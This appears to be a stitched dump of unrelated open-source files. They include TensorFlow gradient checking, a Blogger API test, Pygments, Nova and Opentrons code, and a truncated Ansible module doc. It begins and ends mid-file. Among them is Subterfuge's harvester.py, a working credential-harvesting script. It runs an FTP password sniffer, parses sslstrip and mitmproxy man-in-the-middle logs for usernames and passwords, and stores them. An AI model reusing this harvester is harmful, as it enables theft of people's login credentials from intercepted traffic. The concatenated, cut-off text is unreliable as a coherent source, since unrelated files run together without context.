x_size = _product(x_shape) * (2 if x.dtype.is_complex else 1)
y_size = _product(y_shape) * (2 if y.dtype.is_complex else 1)
x_dtype = x.dtype.real_dtype.as_numpy_dtype
y_dtype = y.dtype.real_dtype.as_numpy_dtype
# Make sure we have the right types
x_data = np.asarray(x_data, dtype=x.dtype.as_numpy_dtype)
scale = np.asarray(2 * delta, dtype=y_dtype)[()]
jacobian = np.zeros((x_size, y_size), dtype=x_dtype)
# For each of the entry of x, we slightly perturbs this by adding and
# subtracting a delta and then compute difference between the outputs. This
# will give us one row of the Jacobian matrix.
for row in range(x_size):
x_pos = x_data.copy()
x_neg = x_data.copy()
x_pos.ravel().view(x_dtype)[row] += delta
y_pos = y.eval(feed_dict=_extra_feeds(extra_feed_dict, {x: x_pos}))
x_neg.ravel().view(x_dtype)[row] -= delta
y_neg = y.eval(feed_dict=_extra_feeds(extra_feed_dict, {x: x_neg}))
diff = (y_pos - y_neg) / scale
jacobian[row, :] = diff.ravel().view(y_dtype)
logging.vlog(1, "Numeric Jacobian =\n%s", jacobian)
return jacobian
def _compute_dx_and_dy(x, y, y_shape):
"""Returns a node to compute gradient of x wrt y."""
# We make up a dy so that we can compute the gradients. We don't really use
# the value of dy -- we will always feed it. We need to add an identity node
# so that we can always feed it properly. Otherwise, for the Add operation,
# dx is the same as dy and we cannot fetch the tensor that we are feeding.
with x.graph.as_default():
dy_orig = constant_op.constant(1.0, shape=y_shape, dtype=y.dtype)
dy = array_ops.identity(dy_orig)
# We compute the gradients for x wrt. y
grads = gradients.gradients(y, x, dy)
assert len(grads) == 1
return grads[0], dy_orig
def _compute_gradient(x,
x_shape,
dx,
y,
y_shape,
dy,
x_init_value=None,
delta=1e-3,
extra_feed_dict=None):
"""Computes the theoretical and numerical jacobian."""
t = dtypes.as_dtype(x.dtype)
allowed_types = [dtypes.float16, dtypes.float32, dtypes.float64,
dtypes.complex64, dtypes.complex128]
assert t.base_dtype in allowed_types, "Don't support type %s for x" % t.name
t2 = dtypes.as_dtype(y.dtype)
assert t2.base_dtype in allowed_types, "Don't support type %s for y" % t2.name
if x_init_value is not None:
i_shape = list(x_init_value.shape)
assert(list(x_shape) == i_shape), "x_shape = %s, init_data shape = %s" % (
x_shape, i_shape)
x_data = x_init_value
else:
x_data = np.random.random_sample(x_shape).astype(t.as_numpy_dtype)
if t.is_complex:
x_data.imag = np.random.random_sample(x_shape)
jacob_t = _compute_theoretical_jacobian(
x, x_shape, x_data, dy, y_shape, dx, extra_feed_dict=extra_feed_dict)
jacob_n = _compute_numeric_jacobian(
x, x_shape, x_data, y, y_shape, delta, extra_feed_dict=extra_feed_dict)
return jacob_t, jacob_n
def _compute_gradient_list(x,
x_shape,
y,
y_shape,
x_init_value=None,
delta=1e-3,
init_targets=None,
extra_feed_dict=None):
"""Compute gradients for a list of x values."""
assert isinstance(x, list)
dx, dy = zip(*[_compute_dx_and_dy(xi, y, y_shape) for xi in x])
if init_targets is not None:
assert isinstance(init_targets, (list, tuple))
for init in init_targets:
init.run()
if x_init_value is None:
x_init_value = [None] * len(x)
ret = [_compute_gradient(xi, x_shapei, dxi, y, y_shape, dyi, x_init_valuei,
delta, extra_feed_dict=extra_feed_dict)
for xi, x_shapei, dxi, dyi, x_init_valuei in zip(x, x_shape, dx, dy,
x_init_value)]
return ret
def compute_gradient(x,
x_shape,
y,
y_shape,
x_init_value=None,
delta=1e-3,
init_targets=None,
extra_feed_dict=None):
"""Computes and returns the theoretical and numerical Jacobian.
If `x` or `y` is complex, the Jacobian will still be real but the
corresponding Jacobian dimension(s) will be twice as large. This is required
even if both input and output is complex since TensorFlow graphs are not
necessarily holomorphic, and may have gradients not expressible as complex
numbers. For example, if `x` is complex with shape `[m]` and `y` is complex
with shape `[n]`, each Jacobian `J` will have shape `[m * 2, n * 2]` with
J[:m, :n] = d(Re y)/d(Re x)
J[:m, n:] = d(Im y)/d(Re x)
J[m:, :n] = d(Re y)/d(Im x)
J[m:, n:] = d(Im y)/d(Im x)
Args:
x: a tensor or list of tensors
x_shape: the dimensions of x as a tuple or an array of ints. If x is a list,
then this is the list of shapes.
y: a tensor
y_shape: the dimensions of y as a tuple or an array of ints.
x_init_value: (optional) a numpy array of the same shape as "x"
representing the initial value of x. If x is a list, this should be a list
of numpy arrays. If this is none, the function will pick a random tensor
as the initial value.
delta: (optional) the amount of perturbation.
init_targets: list of targets to run to initialize model params.
TODO(mrry): remove this argument.
extra_feed_dict: dict that allows fixing specified tensor values
during the Jacobian calculation.
Returns:
Two 2-d numpy arrays representing the theoretical and numerical
Jacobian for dy/dx. Each has "x_size" rows and "y_size" columns
where "x_size" is the number of elements in x and "y_size" is the
number of elements in y. If x is a list, returns a list of two numpy arrays.
"""
if extra_feed_dict is None:
extra_feed_dict = {}
if isinstance(x, list):
return _compute_gradient_list(x, x_shape, y, y_shape, x_init_value, delta,
init_targets, extra_feed_dict=extra_feed_dict)
else:
if init_targets is not None:
assert isinstance(init_targets, (list, tuple))
for init in init_targets:
init.run()
dx, dy = _compute_dx_and_dy(x, y, y_shape)
ret = _compute_gradient(x, x_shape, dx, y, y_shape, dy, x_init_value, delta,
extra_feed_dict=extra_feed_dict)
return ret
def compute_gradient_error(x,
x_shape,
y,
y_shape,
x_init_value=None,
delta=1e-3,
init_targets=None,
extra_feed_dict=None):
"""Computes the gradient error.
Computes the maximum error for dy/dx between the computed Jacobian and the
numerically estimated Jacobian.
This function will modify the tensors passed in as it adds more operations
and hence changing the consumers of the operations of the input tensors.
This function adds operations to the current session. To compute the error
using a particular device, such as a GPU, use the standard methods for
setting a device (e.g. using with sess.graph.device() or setting a device
function in the session constructor).
Args:
x: a tensor or list of tensors
x_shape: the dimensions of x as a tuple or an array of ints. If x is a list,
then this is the list of shapes.
y: a tensor
y_shape: the dimensions of y as a tuple or an array of ints.
x_init_value: (optional) a numpy array of the same shape as "x"
representing the initial value of x. If x is a list, this should be a list
of numpy arrays. If this is none, the function will pick a random tensor
as the initial value.
delta: (optional) the amount of perturbation.
init_targets: list of targets to run to initialize model params.
TODO(mrry): Remove this argument.
extra_feed_dict: dict that allows fixing specified tensor values
during the Jacobian calculation.
Returns:
The maximum error in between the two Jacobians.
"""
grad = compute_gradient(x, x_shape, y, y_shape, x_init_value, delta,
init_targets, extra_feed_dict=extra_feed_dict)
if isinstance(grad, tuple):
grad = [grad]
error = 0
for j_t, j_n in grad:
if j_t.size or j_n.size: # Handle zero size tensors correctly
error = np.maximum(error, np.fabs(j_t - j_n).max())
return error
| apache-2.0 |
openhatch/oh-mainline | vendor/packages/gdata/tests/gdata_tests/blogger/live_client_test.py | 39 | 5831 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is used for version 2 of the Google Data APIs.
# These tests attempt to connect to Google servers.
__author__ = '[email protected] (Jeff Scudder)'
import unittest
import gdata.blogger.client
import gdata.blogger.data
import gdata.gauth
import gdata.client
import atom.http_core
import atom.mock_http_core
import atom.core
import gdata.data
import gdata.test_config as conf
conf.options.register_option(conf.BLOG_ID_OPTION)
class BloggerClientTest(unittest.TestCase):
def setUp(self):
self.client = None
if conf.options.get_value('runlive') == 'true':
self.client = gdata.blogger.client.BloggerClient()
conf.configure_client(self.client, 'BloggerTest', 'blogger')
def tearDown(self):
conf.close_client(self.client)
def test_create_update_delete(self):
if not conf.options.get_value('runlive') == 'true':
return
# Either load the recording or prepare to make a live request.
conf.configure_cache(self.client, 'test_create_update_delete')
# Add a blog post.
created = self.client.add_post(conf.options.get_value('blogid'),
'test post from BloggerClientTest',
'Hey look, another test!',
labels=['test', 'python'])
self.assertEqual(created.title.text, 'test post from BloggerClientTest')
self.assertEqual(created.content.text, 'Hey look, another test!')
self.assertEqual(len(created.category), 2)
self.assert_(created.control is None)
# Change the title of the blog post we just added.
created.title.text = 'Edited'
updated = self.client.update(created)
self.assertEqual(updated.title.text, 'Edited')
self.assert_(isinstance(updated, gdata.blogger.data.BlogPost))
self.assertEqual(updated.content.text, created.content.text)
# Delete the test entry from the blog.
self.client.delete(updated)
def test_create_draft_post(self):
if not conf.options.get_value('runlive') == 'true':
return
conf.configure_cache(self.client, 'test_create_draft_post')
# Add a draft blog post.
created = self.client.add_post(conf.options.get_value('blogid'),
'draft test post from BloggerClientTest',
'This should only be a draft.',
labels=['test2', 'python'], draft=True)
self.assertEqual(created.title.text,
'draft test post from BloggerClientTest')
self.assertEqual(created.content.text, 'This should only be a draft.')
self.assertEqual(len(created.category), 2)
self.assert_(created.control is not None)
self.assert_(created.control.draft is not None)
self.assertEqual(created.control.draft.text, 'yes')
# Publish the blog post.
created.control.draft.text = 'no'
updated = self.client.update(created)
if updated.control is not None and updated.control.draft is not None:
self.assertNotEqual(updated.control.draft.text, 'yes')
# Delete the test entry from the blog using the URL instead of the entry.
self.client.delete(updated.find_edit_link())
def test_create_draft_page(self):
if not conf.options.get_value('runlive') == 'true':
return
conf.configure_cache(self.client, 'test_create_draft_page')
# List all pages on the blog.
pages_before = self.client.get_pages(conf.options.get_value('blogid'))
# Add a draft page to blog.
created = self.client.add_page(conf.options.get_value('blogid'),
'draft page from BloggerClientTest',
'draft content',
draft=True)
self.assertEqual(created.title.text, 'draft page from BloggerClientTest')
self.assertEqual(created.content.text, 'draft content')
self.assert_(created.control is not None)
self.assert_(created.control.draft is not None)
self.assertEqual(created.control.draft.text, 'yes')
self.assertEqual(str(int(created.get_page_id())), created.get_page_id())
# List all pages after adding one.
pages_after = self.client.get_pages(conf.options.get_value('blogid'))
self.assertEqual(len(pages_before.entry) + 1, len(pages_after.entry))
# Publish page.
created.control.draft.text = 'no'
updated = self.client.update(created)
if updated.control is not None and updated.control.draft is not None:
self.assertNotEqual(updated.control.draft.text, 'yes')
# Delete test page.
self.client.delete(updated.find_edit_link())
pages_after = self.client.get_pages(conf.options.get_value('blogid'))
self.assertEqual(len(pages_before.entry), len(pages_after.entry))
def test_retrieve_post_with_categories(self):
if not conf.options.get_value('runlive') == 'true':
return
conf.configure_cache(self.client, 'test_retrieve_post_with_categories')
query = gdata.blogger.client.Query(categories=["news"], strict=True)
posts = self.client.get_posts(conf.options.get_value('blogid'), query=query)
def suite():
return conf.build_suite([BloggerClientTest])
if __name__ == '__main__':
unittest.TextTestRunner().run(suite())
| agpl-3.0 |
crmccreary/openerp_server | openerp/addons/sale/report/__init__.py | 10 | 1082 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sale_order
import sale_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | agpl-3.0 |
ess/dd-agent | checks.d/go_expvar.py | 26 | 7086 | # stdlib
from collections import defaultdict
import re
# 3rd party
import requests
# project
from checks import AgentCheck
DEFAULT_MAX_METRICS = 350
PATH = "path"
ALIAS = "alias"
TYPE = "type"
TAGS = "tags"
GAUGE = "gauge"
RATE = "rate"
DEFAULT_TYPE = GAUGE
SUPPORTED_TYPES = {
GAUGE: AgentCheck.gauge,
RATE: AgentCheck.rate,
}
METRIC_NAMESPACE = "go_expvar"
# See http://golang.org/pkg/runtime/#MemStats
DEFAULT_GAUGE_MEMSTAT_METRICS = [
# General statistics
"Alloc", "TotalAlloc",
# Main allocation heap statistics
"HeapAlloc", "HeapSys", "HeapIdle", "HeapInuse",
"HeapReleased", "HeapObjects",
]
DEFAULT_RATE_MEMSTAT_METRICS = [
# General statistics
"Lookups", "Mallocs", "Frees",
# Garbage collector statistics
"PauseTotalNs", "NumGC",
]
DEFAULT_METRICS = [{PATH: "memstats/%s" % path, TYPE: GAUGE} for path in DEFAULT_GAUGE_MEMSTAT_METRICS] +\
[{PATH: "memstats/%s" % path, TYPE: RATE} for path in DEFAULT_RATE_MEMSTAT_METRICS]
class GoExpvar(AgentCheck):
def __init__(self, name, init_config, agentConfig, instances=None):
AgentCheck.__init__(self, name, init_config, agentConfig, instances)
self._last_gc_count = defaultdict(int)
def _get_data(self, url):
r = requests.get(url)
r.raise_for_status()
return r.json()
def _load(self, instance):
url = instance.get('expvar_url')
if not url:
raise Exception('GoExpvar instance missing "expvar_url" value.')
tags = instance.get('tags', [])
tags.append("expvar_url:%s" % url)
data = self._get_data(url)
metrics = DEFAULT_METRICS + instance.get("metrics", [])
max_metrics = instance.get("max_returned_metrics", DEFAULT_MAX_METRICS)
return data, tags, metrics, max_metrics, url
def get_gc_collection_histogram(self, data, tags, url):
num_gc = data.get("memstats", {}).get("NumGC")
pause_hist = data.get("memstats", {}).get("PauseNs")
last_gc_count = self._last_gc_count[url]
if last_gc_count == num_gc:
# No GC has run. Do nothing
return
start = last_gc_count % 256
end = (num_gc + 255) % 256 + 1
if start < end:
values = pause_hist[start:end]
else:
values = pause_hist[start:] + pause_hist[:end]
self._last_gc_count[url] = num_gc
for value in values:
self.histogram(
self.normalize("memstats.PauseNs", METRIC_NAMESPACE, fix_case=True),
value, tags=tags)
def check(self, instance):
data, tags, metrics, max_metrics, url = self._load(instance)
self.get_gc_collection_histogram(data, tags, url)
self.parse_expvar_data(data, tags, metrics, max_metrics)
def parse_expvar_data(self, data, tags, metrics, max_metrics):
'''
Report all the metrics based on the configuration in instance
If a metric is not well configured or is not present in the payload,
continue processing metrics but log the information to the info page
'''
count = 0
for metric in metrics:
path = metric.get(PATH)
metric_type = metric.get(TYPE, DEFAULT_TYPE)
metric_tags = list(metric.get(TAGS, []))
metric_tags += tags
alias = metric.get(ALIAS)
if not path:
self.warning("Metric %s has no path" % metric)
continue
if metric_type not in SUPPORTED_TYPES:
self.warning("Metric type %s not supported for this check" % metric_type)
continue
keys = path.split("/")
values = self.deep_get(data, keys)
if len(values) == 0:
self.warning("No results matching path %s" % path)
continue
tag_by_path = alias is not None
for traversed_path, value in values:
actual_path = ".".join(traversed_path)
if tag_by_path:
metric_tags.append("path:%s" % actual_path)
metric_name = alias or self.normalize(actual_path, METRIC_NAMESPACE, fix_case=True)
try:
float(value)
except ValueError:
self.log.warning("Unreportable value for path %s: %s" % (path, value))
continue
if count >= max_metrics:
self.warning("Reporting more metrics than the allowed maximum. "
"Please contact [email protected] for more information.")
return
SUPPORTED_TYPES[metric_type](self, metric_name, value, metric_tags)
count += 1
def deep_get(self, content, keys, traversed_path=None):
'''
Allow to retrieve content nested inside a several layers deep dict/list
Examples: -content: {
"key1": {
"key2" : [
{
"name" : "object1",
"value" : 42
},
{
"name" : "object2",
"value" : 72
}
]
}
}
-keys: ["key1", "key2", "1", "value"] would return [(["key1", "key2", "1", "value"], 72)]
-keys: ["key1", "key2", "1", "*"] would return [(["key1", "key2", "1", "value"], 72), (["key1", "key2", "1", "name"], "object2")]
-keys: ["key1", "key2", "*", "value"] would return [(["key1", "key2", "1", "value"], 72), (["key1", "key2", "0", "value"], 42)]
'''
if traversed_path is None:
traversed_path = []
if keys == []:
return [(traversed_path, content)]
key = keys[0]
regex = "".join(["^", key, "$"])
try:
key_rex = re.compile(regex)
except Exception:
self.warning("Cannot compile regex: %s" % regex)
return []
results = []
for new_key, new_content in self.items(content):
if key_rex.match(new_key):
results.extend(self.deep_get(new_content, keys[1:], traversed_path + [str(new_key)]))
return results
def items(self, object):
if isinstance(object, list):
for new_key, new_content in enumerate(object):
yield str(new_key), new_content
elif isinstance(object, dict):
for new_key, new_content in object.iteritems():
yield str(new_key), new_content
else:
self.log.warning("Could not parse this object, check the json"
"served by the expvar")
| bsd-3-clause |
egyp7/Subterfuge | modules/harvester/harvester.py | 4 | 5071 | #!/usr/bin/python
import os
import re
import sys
sys.path.append('/usr/share/subterfuge')
import time
import datetime
import urllib
#Ignore Deprication Warnings
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
from django.conf import settings
settings.configure(
DATABASES = {
'default' : {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': "/usr/share/subterfuge/db",
'USER': '',
'PASSWORD': '',
'HOST': '',
}
}
)
from django.db import models
from main.models import credentials
def main():
print "Harvesting Credentials..."
print "Starting FTP Sniffer"
os.system("python /usr/share/subterfuge/modules/harvester/ftp_password_sniffer.py")
#Read in username fields from definitions file
u = open('/usr/share/subterfuge/definitions/usernamefields.lst', 'r')
username = u.readlines()
#Remove all of the new line characters
tmplst = []
for h in username:
tmplst.append(h.rstrip('\n'))
username = tmplst
username.remove('')
#Read in password fields from definitions file
p = open('/usr/share/subterfuge/definitions/passwordfields.lst', 'r')
password = p.readlines()
tmplst2 = []
#Remove all of the new line characters
for g in password:
tmplst2.append(g.rstrip('\n'))
password = tmplst2
password.remove('')
#Purge Logs
os.system("echo > /usr/share/subterfuge/sslstrip.log")
os.system("echo > /usr/share/subterfuge/mitmproxy.log")
os.system("rm /usr/share/subterfuge/harvester.log")
os.system("touch /usr/share/subterfuge/harvester.log")
logswap = 0
log = open("/usr/share/subterfuge/harvester.log")
while 1:
line = log.readline()
if len(line) == 0:
logswap = logswap + 1
#Purge Logs
os.system("echo > /usr/share/subterfuge/harvester.log")
#Consolidate Logs
if logswap % 2 == 0:
os.system("strings -n 10 /usr/share/subterfuge/mitmproxy.log > /usr/share/subterfuge/harvester.log")
os.system("echo > /usr/share/subterfuge/mitmproxy.log")
else:
os.system("cat /usr/share/subterfuge/sslstrip.log > /usr/share/subterfuge/harvester.log")
os.system("echo > /usr/share/subterfuge/sslstrip.log")
time.sleep(5)
user = 'Unknown'
passwd = 'Unknown'
source = 'Unknown'
for i in username:
if (line.find(i) >= 0): #if it is in the string
#parse for host
hoststr = re.findall(r'\(.*?\):', line)
if (len(hoststr) > 0):
host = hoststr[0].partition('(')
hoststr = host[2]
host = hoststr.partition(')')
hoststr = host[0]
source = hoststr
#parse for the username
tmpstr = line.partition(i)
usrpassend = tmpstr[2]
usrs = []
usrs.append(usrpassend)
boolu = 1
while (boolu):
if (usrpassend.find(i) >= 0):
tmpstr = usrpassend.partition(i)
usrpassend = tmpstr[2]
usrs.append(usrpassend)
else:
boolu = 0
newusrs = []
for num in usrs:
usrn = re.findall(r'=(.*?)&', num)
if (len(usrn)):
if (len(usrn[0]) > 2 and len(usrn[0]) < 32 and usrn[0] != 'adtoken'):
#print 'added ' + usrn[0]
newusrs.append(usrn[0])
if (len(newusrs) > 0):
user = newusrs.pop((len(newusrs) -1))
user = urllib.unquote(user)
#print user
#begin password section
for j in password:
if (line.find('&' + j) >= 0): #if it is in the string
#parse for the password
tmpstr2 = line.partition(j)
passend = tmpstr2[2]
passes = []
passes.append(passend)
boolu2 = 1
while (boolu2):
if (passend.find(j) >= 0):
tmpstr2 = passend.partition(j)
passend = tmpstr2[2]
passes.append(passend)
else:
boolu2 = 0
newpasses = []
for num2 in passes:
pas = re.findall(r'=(.*?)&', num2)
if (len(pas)):
if (len(pas[0]) > 2 and len(pas[0]) < 46):
newpasses.append(pas[0])
if (len(newpasses) > 0):
passwd = newpasses.pop((len(newpasses) -1))
passwd = urllib.unquote(passwd)
#print passwd
reap(source, user, passwd)
#to prevent duplicate entries being found
line = ''
else:
newpasses2 = []
for num3 in passes:
pas2 = re.findall(r'=(.*?)\n', num3)
if (len(pas2)):
if (len(pas2[0]) > 2 and len(pas2[0]) < 46):
newpasses2.append(pas2[0])
if (len(newpasses2) > 0):
passwd = newpasses2.pop((len(newpasses2) -1))
passwd = urllib.unquote(passwd)
#print passwd
reap(source, user, passwd)
#to prevent duplicate entries being found
line = ''
#insert into database
def reap(source, username, password):
now = datetime.datetime.now()
date = now.strftime("%d-%m-%Y %H:%M")
logcred = credentials(source = source, username = username, password = password, date = date)
logcred.save()
def usage():
print "\nSubterfuge courtesy of r00t0v3rr1d3 & 0sm0s1z \n"
print "Usage: subterfuge [OPTIONS] \n"
sys.exit(1)
if __name__ == '__main__':
main()
| gpl-3.0 |
rowillia/buck | third-party/py/unittest2/unittest2/test/test_functiontestcase.py | 122 | 5570 | import unittest2
from unittest2.test.support import LoggingResult
class Test_FunctionTestCase(unittest2.TestCase):
# "Return the number of tests represented by the this test object. For
# unittest2.TestCase instances, this will always be 1"
def test_countTestCases(self):
test = unittest2.FunctionTestCase(lambda: None)
self.assertEqual(test.countTestCases(), 1)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if setUp() raises
# an exception.
def test_run_call_order__error_in_setUp(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
raise RuntimeError('raised by setUp')
def test():
events.append('test')
def tearDown():
events.append('tearDown')
expected = ['startTest', 'setUp', 'addError', 'stopTest']
unittest2.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test raises
# an error (as opposed to a failure).
def test_run_call_order__error_in_test(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
def test():
events.append('test')
raise RuntimeError('raised by test')
def tearDown():
events.append('tearDown')
expected = ['startTest', 'setUp', 'test', 'addError', 'tearDown',
'stopTest']
unittest2.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if the test signals
# a failure (as opposed to an error).
def test_run_call_order__failure_in_test(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
def test():
events.append('test')
self.fail('raised by test')
def tearDown():
events.append('tearDown')
expected = ['startTest', 'setUp', 'test', 'addFailure', 'tearDown',
'stopTest']
unittest2.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "When a setUp() method is defined, the test runner will run that method
# prior to each test. Likewise, if a tearDown() method is defined, the
# test runner will invoke that method after each test. In the example,
# setUp() was used to create a fresh sequence for each test."
#
# Make sure the proper call order is maintained, even if tearDown() raises
# an exception.
def test_run_call_order__error_in_tearDown(self):
events = []
result = LoggingResult(events)
def setUp():
events.append('setUp')
def test():
events.append('test')
def tearDown():
events.append('tearDown')
raise RuntimeError('raised by tearDown')
expected = ['startTest', 'setUp', 'test', 'tearDown', 'addError',
'stopTest']
unittest2.FunctionTestCase(test, setUp, tearDown).run(result)
self.assertEqual(events, expected)
# "Return a string identifying the specific test case."
#
# Because of the vague nature of the docs, I'm not going to lock this
# test down too much. Really all that can be asserted is that the id()
# will be a string (either 8-byte or unicode -- again, because the docs
# just say "string")
def test_id(self):
test = unittest2.FunctionTestCase(lambda: None)
self.assertIsInstance(test.id(), basestring)
# "Returns a one-line description of the test, or None if no description
# has been provided. The default implementation of this method returns
# the first line of the test method's docstring, if available, or None."
def test_shortDescription__no_docstring(self):
test = unittest2.FunctionTestCase(lambda: None)
self.assertEqual(test.shortDescription(), None)
# "Returns a one-line description of the test, or None if no description
# has been provided. The default implementation of this method returns
# the first line of the test method's docstring, if available, or None."
def test_shortDescription__singleline_docstring(self):
desc = "this tests foo"
test = unittest2.FunctionTestCase(lambda: None, description=desc)
self.assertEqual(test.shortDescription(), "this tests foo")
if __name__ == '__main__':
unittest2.main()
| apache-2.0 |
OpenTrons/opentrons-api | api/src/opentrons/calibration_storage/types.py | 2 | 1757 | import typing
from dataclasses import dataclass
from datetime import datetime
from os import PathLike
CalibrationID = typing.NewType('CalibrationID', str)
StrPath = typing.Union[str, PathLike]
AttitudeMatrix = typing.List[typing.List[float]]
PipetteOffset = typing.List[float]
class TipLengthCalNotFound(Exception):
pass
@dataclass
class UriDetails:
namespace: str
load_name: str
version: int
@dataclass
class OffsetData:
"""
Class to categorize the shape of a
given calibration data.
"""
value: typing.List[float]
last_modified: typing.Optional[datetime]
@dataclass
class TipLengthData:
"""
Class to categorize the shape of a
given calibration data.
"""
value: typing.Optional[float] = None
last_modified: typing.Optional[datetime] = None
@dataclass
class ParentOptions:
"""
Class to store whether a labware calibration has
a module, as well the original parent (slot).
As of now, the slot is not saved in association
with labware calibrations.
The slot value will be the empty string.
"""
slot: str
module: str = ''
@dataclass
class CalibrationTypes:
"""
Class to categorize what calibration
data might be stored for a labware.
"""
offset: OffsetData
tip_length: TipLengthData
@dataclass
class CalibrationInformation:
"""
Class to store important calibration
info for labware.
"""
calibration: CalibrationTypes
parent: ParentOptions
labware_id: str
uri: str
@dataclass
class PipetteOffsetCalibration:
"""
Class to store pipette offset calibration
"""
pipette: str
mount: str
offset: PipetteOffset
tiprack: str
uri: str
last_modified: datetime
| apache-2.0 |
sysbot/pastedown | vendor/pygments/pygments/styles/default.py | 26 | 2532 | # -*- coding: utf-8 -*-
"""
pygments.styles.default
~~~~~~~~~~~~~~~~~~~~~~~
The default highlighting style.
:copyright: Copyright 2006-2012 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace
class DefaultStyle(Style):
"""
The default style (inspired by Emacs 22).
"""
background_color = "#f8f8f8"
default_style = ""
styles = {
Whitespace: "#bbbbbb",
Comment: "italic #408080",
Comment.Preproc: "noitalic #BC7A00",
#Keyword: "bold #AA22FF",
Keyword: "bold #008000",
Keyword.Pseudo: "nobold",
Keyword.Type: "nobold #B00040",
Operator: "#666666",
Operator.Word: "bold #AA22FF",
Name.Builtin: "#008000",
Name.Function: "#0000FF",
Name.Class: "bold #0000FF",
Name.Namespace: "bold #0000FF",
Name.Exception: "bold #D2413A",
Name.Variable: "#19177C",
Name.Constant: "#880000",
Name.Label: "#A0A000",
Name.Entity: "bold #999999",
Name.Attribute: "#7D9029",
Name.Tag: "bold #008000",
Name.Decorator: "#AA22FF",
String: "#BA2121",
String.Doc: "italic",
String.Interpol: "bold #BB6688",
String.Escape: "bold #BB6622",
String.Regex: "#BB6688",
#String.Symbol: "#B8860B",
String.Symbol: "#19177C",
String.Other: "#008000",
Number: "#666666",
Generic.Heading: "bold #000080",
Generic.Subheading: "bold #800080",
Generic.Deleted: "#A00000",
Generic.Inserted: "#00A000",
Generic.Error: "#FF0000",
Generic.Emph: "italic",
Generic.Strong: "bold",
Generic.Prompt: "bold #000080",
Generic.Output: "#888",
Generic.Traceback: "#04D",
Error: "border:#FF0000"
}
| mit |
zaina/nova | nova/network/opts.py | 51 | 1529 | # Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import nova.network
import nova.network.driver
import nova.network.floating_ips
import nova.network.ldapdns
import nova.network.linux_net
import nova.network.manager
import nova.network.neutronv2.api
import nova.network.rpcapi
import nova.network.security_group.openstack_driver
def list_opts():
return [
('DEFAULT',
itertools.chain(
nova.network._network_opts,
nova.network.driver.driver_opts,
nova.network.floating_ips.floating_opts,
nova.network.ldapdns.ldap_dns_opts,
nova.network.linux_net.linux_net_opts,
nova.network.manager.network_opts,
nova.network.rpcapi.rpcapi_opts,
nova.network.security_group.openstack_driver.security_group_opts,
)),
('neutron', nova.network.neutronv2.api.neutron_opts),
('upgrade_levels',
itertools.chain(
[nova.network.rpcapi.rpcapi_cap_opt],
)),
]
| apache-2.0 |
petemounce/ansible-modules-extras | cloud/amazon/ec2_eni.py | 10 | 14272 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_eni
short_description: Create and optionally attach an Elastic Network Interface (ENI) to an instance
description:
- Create and optionally attach an Elastic Network Interface (ENI) to an instance. If an ENI ID is provided, an attempt is made to update the existing ENI. By passing 'None' as the instance_id, an ENI can be detached from an instance.
version_added: "2.0"
author: Rob White, wimnat [at] gmail.com, @wimnat
options:
eni_id:
description:
- The ID of the ENI
required: false
default: null
instance_id:
description:
- Instance ID that you wish to attach ENI to. To detach an ENI from an instance, use 'None'.
required: false
default: null
private_ip_address:
description:
- Private IP address.
required: false
default: null
subnet_id:
description:
- ID of subnet in which to create the ENI. Only required when state=present.
required: true
description:
description:
- Optional description of the ENI.
required: false
default: null
security_groups:
description:
